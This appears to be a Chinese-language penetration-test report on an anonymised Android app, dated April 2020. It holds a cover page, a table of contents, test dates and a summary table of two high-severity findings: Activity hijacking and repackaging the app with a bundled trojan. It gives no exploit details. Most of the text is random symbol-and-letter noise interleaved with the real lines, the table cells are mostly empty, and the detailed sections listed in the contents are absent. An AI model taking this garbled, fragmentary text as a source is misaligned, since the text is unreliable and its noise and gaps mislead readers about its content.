. E# D4 }( {4 m" m A P! S; o
9 c. C' [" D& L, Q$ o9 V8 a2 z * a' x C$ H! l& H/ {$ o2 b
4 ^* J ~' M- y$ ?" E* w! R
9 {" n( `8 f' v) z5 y1 _/ P+ x
2 V; s& {, } j
' [; T0 h/ w" u; J4 D- j) d& O: r# H& e
/ p5 q y# y2 Z% r
- d/ M- Z6 L+ }/ U% |/ F/ S5 e& i9 W4 f+ \ j( G5 A2 F
7 i( u9 L: z# \" z9 B! A! J
1 R/ P' Y" e$ s+ K O
文档编号:
! m% ]/ G' C# x
5 P, q, v3 t; C* Q) j
* D. x3 L% I2 v
2 N! E% `0 M3 l. h h8 R% |4 t; f7 v
! t6 e* W% M' A2 z
+ Q- c* f7 K* J1 N- c
) X9 Q) Y6 V" U# K) h2 T) H1 N
# Q4 A- P# U: F( L7 q/ _
N3 S; t1 B0 {" L
8 o2 c9 P$ _) n) _! h3 s9 m
h0 e: N' w) @. Z2 l3 @ V
8 }: M$ {' v; u6 |2 @ D$ `. Q4 k . k! { j* j! ?' a
7 J, i# Y+ |, \, d
: f! _- D% N" a, R. Y
$ V, a, f, s9 S3 U- I$ N 8 c" c. s9 g% q/ q
( g/ S j- D% d9 W6 u" k; h/ I
9 r8 }% v, n% u+ k' r8 ?* N- |. D, r9 r* M
* p: V1 ?% B* p/ `& J/ N
) h: {3 f4 ^, l. d : M+ @: G9 ~! D" s0 I
1 W! ?! p a' a1 _! M% O; l3 [- c
\; l, K9 u" V! V( p: y
8 a, Q5 h% g: c
# Z" u$ r" o9 O& Z( a
8 j8 J( U" g' Y' L
+ }) ?/ g+ K7 o% C; q8 i+ e
/ ^/ O8 {" c& j* i$ q
1 s- Q/ t; l; N B, n
2 g) B- y- n1 |, a3 O; A5 c
( }5 s. i* \ @
6 J( D W2 R6 D3 \ M2 U, H' r ( ~3 J! E/ |$ p5 N
0 T+ \% K( s5 t
某某某APP渗透测试 + s" {6 \8 j0 F/ n
7 o3 y* R0 N/ h: Q+ J* F( Y/ q
( z C) B. |/ T( X0 v+ N; C& a+ I; K( H ]0 I6 w1 |* `/ c
8 ^& r" ^. ^' z* r0 _6 ~
& A# U, W4 P6 O' G/ N4 ^8 T
2 l( V* x6 Z' K
- Z+ ~( I2 F& u0 [
" y& y# c! |+ t
, r3 j h% d" ]* E1 n: |: B; M0 C; G5 O; }
a" w8 L8 s3 a. A1 P" p* y" Y( i8 e8 N# @
" P5 Z% P$ D$ ^. Q( Q) @( ]
7 r2 @; p, o! @0 Q( c+ `" z, D7 Q4 G
' Q- O2 J9 ~ e7 }( E& U9 m0 [3 i: l
/ J. x2 T& I1 U. S" _* e$ o1 P
3 T7 r; L, c+ t# Z+ ?" y / ~; f$ z* I. r% X0 G3 h
" u# O! o0 |3 N b" K4 b+ }& a
% K. E# a, K/ W$ Z6 M* E
! N# Z. Q7 N+ W; B8 J2 C # N* _, L7 H5 N$ s* a7 L3 B! n
0 ?- O' Z. J0 d6 I
) Q' e1 u2 A- h8 f3 N7 _0 O' P
+ A1 ]& t: r) _& o( P
& d. l6 ?% I8 v$ r* r- n$ B* g5 C* l* o( `! c B
- R; F3 ^4 K6 b: X# }2 ]% G
/ c$ [3 O9 }: j1 C3 S2 ]
技 术 报 告
% q& l2 w; i8 z& `1 K8 q" u
4 Z# L o, \: m5 M: @
7 C5 T5 S5 @, f, e+ C9 M
. w! w( t: [: b/ W / z1 D8 k# B1 C$ d, h( V' ]( `
( V# f; c) d' |7 I/ |$ M
# P; S0 p( v' t5 h/ x! N# ?( a4 o: t% j; ?
* n: ?5 ]/ F, v
0 k. G% h: r( @# a/ v% \8 M2 B , S/ G, z5 d9 } ~1 P. \/ u! F
8 N* X K+ R9 U* Y - k% W6 l1 N& S6 c6 |% ~; ^
5 ?+ |3 M$ \% }2 m$ x9 |
5 Q2 l7 p1 `# q
7 ]' u1 _- J" q+ ?; ? [ 5 Q. ]5 N O# c. e
! P ^+ x, f: T/ d
- M0 ]% E4 T5 u& V0 S! x) h0 @7 `* k. s- w
% p* c3 z8 V1 m) t
5 }' v" v; u+ G% z+ f6 X% Z" L2 v
# w3 S3 D$ V$ t ~% M2 s3 {, ], p6 l8 W, R3 j
+ w1 f* B R. h9 ~" m# g
, b# Q9 F! g4 F6 q/ X' T( ^7 w
0 ^# A0 l: l6 i% U; j' i* J) f& f) y+ i7 N- p5 _7 h) C8 l
' A, v! Y2 K' P1 m, \, N, ~* W
- z2 P8 D6 _9 Y0 N5 A" I- I% A
" c5 ^) @/ ]( W0 W
9 Q8 g+ Y' J$ H
( Y7 `7 T$ [; p* j
3 ^" G8 L* I: q2 [6 y( c : J8 g1 S! i6 [+ Q1 t% y, C; K; {
. B: m8 d4 H9 _( o 3 s; B; T8 V+ I- f3 X2 N
5 ^& }/ a* l( I6 y @3 i
" q, R- B3 u/ @# g* J1 Q* y
$ H2 p _* l- c$ ^
, [- R9 h. X6 T1 V- t% X2 f) Y) {0 {% g1 S# }% R
3 ~, z8 L3 x! }7 }# }
) c# x2 G( u2 o) S) R
, a5 [' d0 w! N f
' X; ] ?% D) `8 G
0 |$ Q) R! w; K- p! e
$ [- Y8 W3 h! G ] $ ~" ~+ ^; c8 |4 r2 a. |% _
9 c9 z0 b* j* d8 c* o
) N3 b. K& y" d5 ~/ ^
1 E6 R$ k/ Y+ Z; a, z) N
9 f+ H: ^8 T# r4 g: r8 R3 j0 H1 U7 h$ w$ F5 G7 `) L
9 H M2 u ~& A+ v; I) g2 K7 }4 q ^4 O- _3 Q& f
! b+ \! E. x8 b2 c$ S7 @, d$ b
' y& \/ L5 D& J) l: E/ W3 I7 N
( l' y Z; t# f G! C9 R2 s A
' p! r9 w: L Q. X
/ u+ g" V$ P8 S
, w) ~0 R) c* V i6 m6 z
) C8 v2 r7 ]5 ^" Y0 n0 M
) e6 H9 u' `; L2 g) O
6 }* ^" F& k* @+ A2 G, X
$ P( i/ V) L. [9 u
$ P! }) Y) ^0 [( S0 G4 |8 M( _+ p/ O& |4 i5 m. C& w
5 X) J3 L8 Y/ `; v# A
: n3 C! N9 x9 K6 ~. f
7 [& X* o E- k, f* O7 k& Y4 O2 j! |. o9 F; F7 f" u
% h6 i1 T$ o. D" G
7 j7 r9 X1 y: p: S' _' G( i
* ?) |& x' t# l; |6 P6 s4 p, p7 C( s
+ e7 y8 S$ j! V1 A5 D$ s
1 t v. f: D: h+ g9 e+ s . B3 F7 X. Q$ A4 H- G, n7 [ R
+ I+ R( X6 p: h( f7 e& Q
* q: f" Q6 O: {) ]! F
5 v# s, |' u0 a# f" w + z+ }6 g4 h+ h% B; f/ w) i! q
) M* S- V3 \: ]+ l9 Y+ B4 K
' }' u- ?4 E& B, c, a+ v
0 U2 d4 j! M/ a R% f5 Q
, c8 i7 u7 l$ e4 M0 I8 }8 W
Y. R! T, ~: j
3 ~. @0 I3 ~& P. O6 ?3 Z
% v; M, G3 f- b8 R, z: Y
* y _& C; s$ |' H7 d6 O: N6 `& k) S# z/ |! d3 N1 e
' E1 Z- a7 [" E% m
* {8 h X6 f/ r( j+ C7 x$ h " M. R, Q/ v! u
. I# y+ o$ ?5 ~ * _# g7 a1 _7 e& l+ k3 z$ I1 i
. _+ f1 d. _/ `* f( d- Q+ n( [! a( i
& K* M# w' Z/ S, D: {; b# ^3 W
1 S- S3 N( Z9 E( d) `
2 W7 Y; H3 ]; I. z( R
) l6 K P2 o. b+ H6 k! q* E) _ ( d" |( t( q% `+ `% w
& V* x3 O8 t9 ]$ j- r
. m& ]2 b' @) w* {% f4 R) f+ K# @9 r" t2 `
' K9 M9 o5 V2 k' b; R! |% C) c
8 |4 n, r6 e% x6 j% M& K
- t9 `& G* T- Q7 s' k4 e0 Z: L6 u
4 \' |$ T# G( w; D: e& T
0 b) W2 R8 v# U; f; w1 a1 Q1 c ' x: J* f; o& }
3 \7 k. ]- k$ t 二〇二〇年 5 l P; A" | p6 Q
* M5 W4 ^+ M2 w9 o: O- Y' d4 A
9 G9 g0 X2 J& Q: f7 b/ ^3 c$ }6 o# {1 v) Q; ?- I; L- W+ V
* B, G* w; ?. d2 _
+ w' q u# j2 o+ `
6 F: h8 c) u1 U) c
! B! Y! t* y2 w \5 a
6 Q4 E0 s2 Q! D, v5 O
; d8 R, V1 A8 r; n/ @, d : ], w6 I8 ^# ^5 v) c N& f
+ c0 A( X9 d G U) k
" _) y( w; m, d0 j5 l5 N$ i
2 V6 N$ }0 G% Y# @, n4 `2 d( m, p
' H7 R; j: C2 x9 i1 v5 _
, ~- m! T d; J 6 C3 w6 N) o- N/ A* i) ^
( Y% h* c- }: U1 n! O4 n: C. D
6 }) i, W% M8 J0 H, E. w+ @9 k
, {0 I# G+ ]: S. U& ], L
6 h* j$ Z+ H+ Y
& f. y* C6 @9 m* e
目 录
( U. I3 ^1 |+ Y7 w3 V! q) Y1 i) M7 @+ T* ?
% E0 } V; v* f8 i
|: M* L0 d/ p+ L
2 n5 d6 q) K% R3 b( x5 b x6 }+ |6 ?' I. R+ d% Z) ^2 P5 g
$ P! V% |/ |8 w7 |* ?! c3 }. t& K- @
6 ]; a! R. d A1 |. n# Y% z1 e7 c8 q/ g; {4 g% p2 }
, K- t; I* D8 R0 w7 {' T3 h6 G5 f( q9 V$ [/ }6 X+ n; n
p K4 r! v: \
# g/ C% j6 m9 w1 Y2 V
1 概述... 3
5 ]* b: [, \' {( Q% g% Z3 a) L& B! G: X/ _( w
9 q0 W% |& C! c3 f; Z& E {
. \( `% H# i( @1 u! ?( h% N
5 [6 ?9 U+ V6 v
1 `& a. X8 |' T( n/ A. \' e0 x 1.2测试时间... 3 9 ?* g) s& q! ?
2 b. F. b5 j% B' s7 u% K+ ?
* l( g3 f4 R' ~% R& Y' ~
8 @. _ E7 P' D1 Y4 { : W8 l; x, }7 ~5 |/ b6 A
/ ~8 `% m) P, s- F6 r7 q 1.3测试对象... 3 8 U- V/ J. S7 ~" e
5 o! K% Y* x6 M2 L: v& H* l& l
4 C: S: @( N6 s, k0 C
+ C/ g" H2 X8 j! Y* W5 f) }
0 \$ t. `6 i9 }- a
- J5 Y3 ^) Y L( ?6 k% P& y! M 1.4测试结果... 3
* @4 ^/ i/ J/ L# \( X8 ]8 z3 g, o0 q
% F: S! o0 F" _: N
- B$ V k9 M& u3 f3 }- x
! ^$ Z' T+ p9 b5 a/ }4 @
1 \$ I g- D# u3 B) ?! N9 y$ X
2 检测结果... 4 7 F( k) R, _1 C9 F
5 M) V( \' W' f! [5 f
, q2 Q2 }4 Z: f/ d
, e2 ~# @, a/ e: j
0 h" F( {* y- m. l) v3 I" `( e1 N# v3 B4 O( v; I8 s
2.1 某某某... 4
6 n. ^6 Y& x0 n
/ F! y+ m {8 m) c
4 R! l, [& w# h
$ A0 y+ f- W! J7 f* _
% e) U; q2 J# ]- Y
2 f, a+ s- }2 t0 [ 2.1.1检测目标... 4 ; | f" @3 U5 @; ` m/ B7 F
& Y2 F/ {7 C/ X0 P, p8 I9 ~
) I: L: S5 s' e
% V, c* v) q8 F ]
4 Z; d1 V1 j+ V5 } z
0 @$ c9 {$ _: |2 V7 j; K* b 2.1.2检测结果... 4 8 X( T3 w9 b$ A/ [9 x5 j
# Y, X0 Y9 \! t( ~ X4 i+ q$ d
8 ]+ Z0 g/ s' _+ v# k& j) K; t$ i8 l) M
8 O9 v+ k) L; ?0 m0 f1 {) ]) K* b. T3 u# H* x0 v# n% \
2.1.2.1. 4 1 w6 d4 H8 y# v- Y% ^
. d, }4 }+ i U6 z: r
4 b) c- u# D0 D5 J5 ^7 m3 N
* n4 @: t( y: m- o+ `) b
) r5 b$ t8 c1 J7 S- e- M" e& { C# q5 L
2.1.2.2. 6 . ]$ B! P" q0 e; `1 |$ @
4 z1 j5 s k. O2 M
; P( D+ T3 s- R& W/ W
8 I8 `2 i* j4 f8 f1 M% y9 p) x c
9 W- T' k2 b- p/ S8 \3 h+ ~( p- a3 O' B* P$ v8 d" e+ |' Z- t, X" C
. q9 j; H/ @# Z7 `* X9 n# S; H9 e4 j- {8 X
e7 J, g' D I/ q0 \7 u7 g# c4 Q
# ~; ?' a$ d- v* q0 j }# W" c1 ?
8 p4 R ]! \! q2 E
, D$ g7 O7 G1 u
1 w+ e- M; Z. }! m3 F9 ^3 L
" @4 d$ o( T' M! Y
" i9 P. d" \: j! g) S1 T% z 9 |9 Z% H" i/ ^% G- [3 G
; r# ]* Z/ [8 s$ ]
+ J, a+ j* o) ~0 i2 [, Z8 T$ o2 {, q
1 概述 ( a! U" b" `+ P7 B6 `
7 d. F) ?0 y' y! t5 j! {
+ n# E: `8 q+ l
k# x8 I* Z$ }' I9 Y3 _) P+ [& a - h+ ?: X ]& [9 b. F7 t ^
0 H& q: m7 ? O3 p% I) a) ?) B
1.2测试时间 $ e* K8 c' T2 y. V
$ G4 h1 j$ X& C \5 r# N$ B) `
% w3 C! F9 \! C; M. P3 X R) g+ k0 i- G4 X! |0 q
8 v, \9 G; ?5 P' S4 |% F
+ h+ H3 i2 o8 y# V% M
2 H1 C- W; V6 V* T2 r+ S: o* h T8 W9 J! ]4 q! \
+ r# |$ g0 x, ?# @. r9 l# z
% w+ i( ?( V2 K |
T+ E* m- H8 y( ^% P4 z; d8 L. J
& e H5 w8 w. }- T8 Z9 @) }
9 K5 o$ L7 [3 f# U4 b7 A 渗透测试时间 " Q" Q X. u& s7 {' V& U+ l) R
7 M, ]& q! V* t" @" b& [$ A
+ O' Y) k* h( o" ~; m- U6 h. A- q2 t' G
| 7 O( G6 z7 M6 D( a
' s: W, O7 D" I! Y+ x; e
- S M1 c( |5 b8 A$ p0 C& G: @; H) d9 j6 j. |5 D
. @1 ?5 A0 W' i7 x) F7 A4 z! }' S* s `2 S% z7 m7 o: j
| % }* ?: A* A" }0 T" G1 }
: M4 `0 u% W. ~
# G& m( O0 y' I/ {, c
0 J" w5 d/ e3 G% S" L
起始时间
- f, Z7 J# d- M! e N; ]5 [' z6 O/ |$ ` q5 w
& ~5 @# o/ ]' a
$ [% u; ^- e) |' g9 C |
: y# R+ x; K+ r1 E4 j2 Y$ H! _' b0 ^/ {) ~6 Q0 q
- ?( x u$ n) T6 e; F& O8 Q
0 @/ k4 J5 @4 }- Q2 ~! a5 _7 t
8 ]8 p( C5 S$ X7 C: o( t! q" ~' q2 P; [. ?* [0 h" h
2020年4月6日 I* {9 w# x( N$ E" m5 r5 `
( }; c9 o. _* Y0 w& A ) n, u) {6 O& b3 }* @/ X; c
. G4 b, B3 \) @7 O
|
; y3 i, W8 G, w' K: R4 ]( @' x% I T Y* k$ ]$ a' w! @: D
* ?& B' V% D+ F+ W" c1 R
7 E9 k3 w8 D6 V4 }. {3 P- G! Y' _ 4 i- {7 p+ M! h* O9 Y& f! x
! I* G. s& i' a# H | - T+ H7 ]. E: r. [
. J2 t u. [- g; `3 E! j# T ; ?2 x! x: `8 [9 a3 a4 s
. O: U* a& k2 m 结束时间
! t/ [0 J* i+ W% Q! W; x$ V/ ?" V- X9 I/ s% B$ W1 R8 D. I# u
# a- |% W# z* I$ j8 m. A3 M! p
/ y4 X2 J9 g/ N3 f7 j& Y* J
| 1 g7 [" K% c* }3 K7 D9 X
9 c" B, _8 U3 g4 U + e+ H S0 q( d
4 [2 ~' T$ M- z. p4 R; i
' u0 ^0 G, o3 z3 B( L3 y* ^
6 Z. W" d6 F. y& r1 y 2020年4月9日 % R( ]! Y: ~+ E2 t- w8 }1 L1 j3 A5 v
$ I7 V0 C' q. I7 T" A
( b- C7 Z. k, g! S! i7 _: Z8 e! O
' B- W# f% R7 w# H, N; ~' O. Y | # a+ a }9 B+ E5 I3 g
2 X ]( K n) G8 A* v
6 j0 |2 I, l- I, Y7 X
! u6 M* o8 ]# {/ g$ V% }" A1 ]
4 Q e: p3 v! l o# O0 v! ]2 d6 r+ B/ d
- `/ t. `1 S# I Z$ x9 O `* J" w1 g4 _
) }5 r+ K) ?1 A& e6 O6 i
" s: w' f. ?1 @/ n) W) K
1.3测试对象 % W0 l b: f+ k6 @8 F
2 w6 c6 ~$ K! x0 r& L3 S3 {" w
" k. r" r8 R) P) a8 v
8 O5 h" a3 _2 Q2 d1 s1 y- S
+ c0 o/ Y* a# I
; \( @( p6 x! ?: B0 f) N* T8 J e 此次测试目标为某某某安卓APP进行渗透性测试,APP存在安全漏洞数量如下表所示:
1 c( `) x, }7 g" e S3 W' ~' ?. e4 X+ U" O3 ~( A
$ A5 K7 ^) B( s
- R6 p) n Y% m g: }
& |4 u' n7 v1 n! `
) H3 L9 S& @5 l6 Z 表1-1 检测对象
( M) [3 r% D# D; U4 n/ h; e* L3 B0 l: z4 N+ V" h' m; |) L
4 V' b& F- h @& L" R' ]2 b4 }) p: {+ v) k9 {- e2 Q' P
. p7 P' q; B. y0 H
* e" a& P5 ^8 w / i& u8 U6 y" ~1 { \1 b6 E3 w
9 S1 K4 z' q" w, H1 Q/ {
! C! k7 v. r1 p1 p* X
3 Z; ]% b( H) w% |- ^' O. G0 N |
0 c9 U2 Y4 c$ z3 t3 D- {: U: b3 Z; O/ w ]. x
5 b, l) t, \. w I/ l3 z
4 v3 ^! `- A0 v0 o5 o. x) G 序号 , ]7 N& D: J+ u. o- A
8 {. v, P0 V$ z% b7 T9 n5 M+ ?/ N 5 |- \& t/ t! C& @3 }5 z
, z- i# Y( H p8 T4 L; k& s( F
|
& [: l0 |( b# R6 v7 ^( j v4 b) l5 C' v& p
( |* f: W# B9 j8 s4 s4 }5 T- s
y/ D! ?, l1 g
+ }' l" E2 c4 i- O
: r4 n/ ~, m4 B6 u 测试对象 & m( H2 [5 c7 T7 Z# o1 a7 z
( ~& z: j6 M8 y/ G
3 ^: J9 X3 u, e0 E3 F, R/ ^6 {$ Y9 H9 _* m2 e
|
7 w6 h# W9 V# I- X: ?. T& ^5 q, Q; w* B/ U. C2 ]+ r* ?" v- G, n
- O( B: j Z8 D
# y- `9 t2 G6 {& k6 E+ G, i
# N: u9 P8 G" i s/ ~& W$ X3 ^ H
测试地址
" [1 d5 `0 O3 w; H7 M: `2 h! p i5 ^% u$ R' q
' N$ j$ ]5 p) u8 O! {
; v7 S$ O* E# H/ R* M, Z7 c |
8 X0 G' T. j2 K+ p: w
0 p+ @* y2 c6 X6 z
& y0 ?) y- i4 I* q+ Q* Z3 B3 D( ^
( G1 l; Q" A9 _3 K8 t/ A% s6 G5 ^ 1 i+ z8 i r- g" \$ X0 B
" i4 \) G; _# s7 u 安全漏洞 9 c& t$ j {/ a& {* S
^0 U g0 ^ {' `
' S8 n6 h5 n; T- P& E5 |+ v
- C5 x( @: L0 z0 o/ l0 z | / ^8 y, |: P$ i _- a* O
( j* O# F2 Q* u* h' ]# e0 d
# @9 I: p: m1 t" a8 j7 V8 a$ |. P4 {3 \1 t$ @( ^
- j/ H/ _ R" M
2 {0 D6 o6 X, y5 q |
" h1 b! O5 Z$ V% q/ I0 H. R4 `/ _& I9 \& k9 d1 }& u! A# b1 K0 A
/ X# u& i3 }2 ]' p3 y
- \/ }1 u# ]+ c; y- l4 W; c 1
! [& J- b; Y; M6 |% I( T; s
4 R2 D( L5 R+ `
& r/ B8 k8 @' c4 k2 `' w: ~3 e; `0 U' W6 q3 E6 R0 U$ M% ]+ n
| 6 r& k. h, T; _0 T, [* r
! G/ o3 Q% u1 [( O$ }% h 6 V, ~. Y/ v* X# J$ x9 C
/ N+ t' a, ?* I. b6 T9 F. i. q7 z
B; W( D5 ^: M
) u0 |( s) h- b3 F- ?0 @! u 某某某安卓APP 4 Q# ]3 c+ v% }0 ~$ m E5 Z
9 f' `9 L. c$ I6 P( v
. }1 c6 P* h0 C" q. w, |& c- H4 H9 Z3 @* c: n% ?
|
" j7 ], e: ?0 c
9 R* ~6 @7 C2 |' J g4 E + v7 f; `. n9 S, R9 {0 R
1 d- s2 A' R1 L+ n$ k7 F$ f
1 x D, B+ f6 \& a j) ~, U+ b5 ]- `# M/ {1 Y S1 D
. n' j% b" V, q. ^" D
9 G% w* t# z& Y1 [, v
& w, v3 @6 X- Y8 e' j
4 Z7 T- |2 \+ o* v |
& H# ~8 f' w0 {, Q3 B2 s5 e: @2 ]' U1 C
8 r* t0 [! U& J \8 J- O4 j4 Z; p, @/ [
N X: ` _% y) L4 ^* X1 W* G
2
3 ~9 {, H( Y# @1 a% I6 g( Y$ X) q. ^# |! C% u; N* J
5 {* }/ y3 h' p$ K% [8 T
7 b7 y, ?" @9 \$ ?% r1 k( H |
; U, a! M R8 I( \6 C s0 Z9 _5 b+ E A4 A% X: b
$ H; ^0 l. B; A
/ ^2 o- h j- F* o " E& R0 Y% u3 J6 g- ~' j
: l' J. y+ M0 A! \) [; ~' J; j
! t' J3 h( B/ R4 ~/ ]
2 R- e6 }* x& u " t h) y- p' [7 X
6 P8 v, B" O1 C2 B: k
1.4测试结果
; [% D- Z1 j' A$ t0 W4 i2 X5 y" E& I' o) @4 d ?# ?1 o
* u# b9 {5 z- `6 @) X" A( G# S$ q: R0 K# k* W& y- H
; ]3 f: B1 e5 O
0 h" F" p2 S; |& P* ^* d" J5 T
在本次对某某某APP透测试中发现,APP安全防护存在一定问题,主要问题如下所示:
% r* Q& D- ~; o3 J, n/ ~8 R
9 x. n4 Z4 C" ]2 p: y8 _
" M2 ^7 p. m/ N, t2 I
* Z2 r3 k1 n1 a- A1 ?2 O
- A8 q! h, N2 x
6 D$ w( P( H; Q9 r: n$ C# b1 T
; U- t Y8 e/ o9 Z- n
3 V6 Z" t6 S* f4 t& \6 ]- r
4 T. v3 w2 `: `) p% j- v
! H- u2 a. W+ Z! |
, y- w! Y% N7 k1 z5 ?
X2 Z; X5 A0 y ?7 e
9 }$ V# c$ w' T4 S0 M! e( P" n' V* R3 r' T/ R/ {5 \
; p. ]) o6 w: u# t0 m! Q* e4 E
6 G0 a+ O% o6 x! S' W v# i
( e$ k- D) A+ v! N% m* N! u, z6 B; k. t
| : M- s; K1 Q% A. d8 E% N" _
' Q8 S- T2 D" S: I, y# t9 B
4 o: A6 E8 L8 j
# c; [+ T0 P$ C 序号
3 Z6 w9 D) [( |% K! u
5 s- `. r q; \" s+ ]* i . G1 y% t% T# x6 B1 W/ _, s
) Z! M/ B: q4 o( |/ m | ' b+ K$ D% ~: o5 h: G. b+ C- E
! b6 D/ a7 U, k5 D5 q# s& O* X a 9 V& x, |! ~6 V& p% [* e) _
, |% ~6 H9 Y) N& o- X& O8 ^' d D
5 R, W! R" U: E6 ^8 _9 C: I: Y
' a F6 ]6 p; p4 V1 C( ~% C/ j 系统名称
: @! E" g' I3 X1 |9 E6 U6 O. G. G$ Y' g
3 W9 W3 T" Q7 C1 r$ F/ C" x& y( ]7 p6 `$ ?" R8 _& C _2 x
|
& a& F8 ~" [) E* C+ Z
( S2 Y, ?9 v6 @6 v8 y/ b- e 9 ?! N2 c0 O7 E$ }: ~, i. j9 l
! A9 r$ ?2 O! L# h4 B. f6 j/ p% l
) }+ E; a, f! r/ o! t4 L
( A( ?9 A' c& k 漏洞名称 ' h+ a% h8 ]+ \. `* N
) |" ?# K, c& b& @3 w& N
( q) s6 V# u" U3 K9 b7 Z* u8 i9 p! n4 ?" }- `3 {* {% O4 o1 E
| 9 _% v( e& c: u# o2 W* L. a
( F* Y5 Q! d' ]2 o C m, m7 M7 I5 o& a
% I! T& F, F9 h v
, a7 z' f1 W2 n5 X" i, f8 P3 P, o
$ O. d( o G' P! A5 u
漏洞危害 7 o3 n- w5 W* ]
) `+ h0 Q: U7 w$ D6 U) |" T: n8 ] 9 n2 v6 O: {$ Y% s8 P6 V& M
! O: x3 S0 m$ f0 n, M4 B) L4 \
|
& x A4 H) S4 v+ l# A. `# M/ l8 v. S4 e4 j2 ^0 S
# \) }4 c, E2 u
6 O( L- ~! [. C( \* K' [, k & e1 B/ I" c2 `* w
+ f, ~4 u" x$ B) d0 |; \ 修复结果 & k0 s& o# G* Q5 r) H
7 f0 ?% ]+ z" |) d
' `( s6 s, W; [, X+ F: r% I- y. C: F- r* w5 t4 S6 U2 _5 C, R. ~/ V, `; V9 E
|
; _6 a8 b0 G! m4 @. `! X+ V' R+ B+ U
1 {# R' B* k5 G9 Z+ t: V9 }
! z8 p+ o% Z/ i. |8 H, b- l
3 ]' w/ U3 x3 D& T' q# w
1 k! t# _' \: g" T/ z8 }9 U |
5 t6 \5 a# t7 y& w' n/ p9 f7 W; r: O3 g* m& c
. ~+ ^& z( [$ \
2 D# n# K9 L& J/ H+ k) z! s
1 ' }$ D3 B; ~3 ]: D* x% n
# L* u" Z! v% U# W _ ; d1 F* m9 M- r/ e) g- u& D* ~
6 x% B. {5 s+ e3 j% R9 B8 g4 E
| $ ?: x h( ?' [* }4 @
) x* v+ b* s+ x+ H- D z
6 i+ c$ M x; _! b2 j0 C
2 Z7 ?3 D: E4 W9 L ( r% |! _9 T4 B4 k0 H7 }( X
{; d5 }9 I8 w9 L Q. F 某某某某某某APP
7 s- p( w. E% M( }6 U
- q5 Q' @* a' z2 c: S . O4 Q6 u/ K2 e- Y; s
$ U$ C; P5 S- `
| 5 Z( H7 V& C. N) C# H0 T
8 z8 c& w) [* ]; J7 }5 z- c6 L # r( s7 o0 i$ K+ k
4 E: c+ i/ b2 D0 b. g; K ( |8 I" G" J. M7 P. U S9 w
2 h1 ?* @( w2 k* g2 b7 S: E
Activity 劫持
# z# L9 L8 X" z5 c# K( {6 p @; A4 p- ^
" k6 f. t; r9 L" o) ^$ M
. D2 f8 `4 a' \, M! G
! K+ H4 x. ?/ J/ Y. C% H- h( x. o& b+ ^% X" \/ r1 x
u' O# B H8 w' E
5 }2 a9 z' f- h% K5 p5 g ' C9 f* C$ x$ [0 E8 ^0 p
7 G0 ^6 { w2 G/ v' X6 H( s
|
/ q0 V) W3 j& D0 I
- D L: B5 X% T: ?7 S" c1 u$ s; C& Y
' v& r) R V" R! F% s( T
3 R: x- K+ x0 J
$ p& n; z8 n* ^" J5 Y9 g) g/ q% [* z* B+ w; o# v5 J. w8 i
高
3 h4 T# y6 _! j9 f' {* i' m" t% M: ~* ]
# [% x) B: u- o" A& G
6 N' a/ a0 \; N5 T6 J | 3 w7 G. f! R) r8 D
1 I0 b1 s2 e: D! W) C* M$ B 8 H: Y! G! t J- s
4 j. U7 R, t* B: t3 o4 U7 ]" }" J( l 9 O6 \% W+ M- k7 }# M1 X! y
- d/ l ~2 L; H7 L4 ?
8 k6 \3 v6 D/ K8 j
5 i' t8 [8 e: H9 U6 {( z4 }" G/ b
; `7 i: k1 s) t* O/ G3 C# ~3 _# N+ a- Z/ c/ ]* s7 l
| + c7 l. e( r5 P3 T
* O( ]- ^2 t y& ^* C! N
8 T, c; {: `' m+ r5 f7 L, I9 T+ `4 N5 H* B9 {; B7 n- J, a
6 ?7 H. e: `) b/ x j# G! `% Q( ?- y# s! J% K
|
( T- D1 o4 A+ f& S" V1 }
0 h5 b& a! B4 ?* a! e
& a' p; N- ]8 B. q$ k- M/ {
. O/ a! h f$ l, G+ [1 C8 X 2
1 w2 ?0 X. f6 L9 _( g% V: p. J
9 a! r9 L) H& I7 K
9 {; A- S1 s" I2 h0 R& P2 {+ r# V6 }' S
/ I1 a( q4 k3 m7 d4 r8 L, D | ' K, F9 D+ P" H6 o) f- a+ n& Y
2 o! |0 |4 A* d' s8 [
0 C6 V9 a! h7 C, ?! G6 b1 o, S1 U, P1 A% a
, R% v1 E+ W, a, b
& w! h: j/ L- s8 U 某某某某某某APP
/ g P) G) p; F7 l) v! e, ~$ [
F3 X {) n: @! Q9 P$ p 5 B) c0 P! _9 O( Y6 [1 I
3 U- Y4 _5 ], V( \
| 2 ~: u; ]" X) x0 L' L: B
2 h% i7 h) T, C$ Q8 Y% i
; }4 L3 O% ^1 Z
2 z9 `5 \' j C% z0 b/ t5 W, P
! L/ ^% P) B# N" p
6 b9 `( ~& @3 c/ ? 反编译二次打包捆绑木马、篡改APP代码 & l# o. D. t) m L
2 a7 R; `) _6 n0 s/ h! v
: {2 u2 K2 z5 v, b+ Z$ y4 B7 _ k
2 j% S7 @3 d H9 x& z4 L g5 `
| . ~( v1 q: r8 U3 k1 j0 Z1 p
6 l+ I/ q1 }5 `& W
: o; u* {3 U N5 e
! w& ] |8 S6 j7 R1 `) e/ m; a
' j+ x1 @" N8 z% A
* J+ R+ @( Y6 w& X
高 * `. I; t, q4 }6 }7 V6 d
; A/ ~2 ?) N1 m0 c! Y( q
7 [9 z/ ^# L4 o
3 p8 @' p3 a) W1 X8 b7 `) y
|
, l4 i7 r1 b5 K, a" q$ n" d1 J9 c1 M% u
! {* ?4 @7 P, G: W' E. `4 R
& A( a) m1 C5 G* I7 Z; q V
! Q" Y5 s5 g7 a5 z' W% h b) }& I. y/ z p6 f
1 y9 @ c6 n* O0 N' B h9 Z! R0 Z* R
% i/ V' [4 x! \3 W; a5 n" o( h1 ~$ ^! D5 T; M) N! S9 k5 y9 @" Y
| # L8 g( z& y0 r1 z7 f: q
. L: T: m! q8 U. |# D
" _3 N" w8 P8 M: g6 s1 F: t$ K" H
; O7 ]* k! B# p: V ! M/ C# Y0 c/ G: z
% C x% n, G7 T9 `
% u( T6 P% p: K; j. s7 B4 r4 r8 ~! o: Y7 Z: P$ {8 `
& P9 N2 Z" \' r
- J( P5 R) V& Y2 q
( N+ u9 B# b7 E, ^7 K: v
K$ C1 N* C! U- @. B2 N3 v
8 u3 q* ?( A5 E# ^1 @
1 e$ j8 J: v! j L0 C, `
! {# c: S% J& U) J7 r& g& a4 D; e$ }5 J% |$ @& N4 \
% Y) L* }, S, _1 C5 m& S5 R
: C) d5 n. Z0 ^ 表1-2 测试结果
N! ~9 a3 @' |" L! |7 S) S7 o1 |! y: o: ~
0 Y/ n2 V% H# w' J q; w6 t
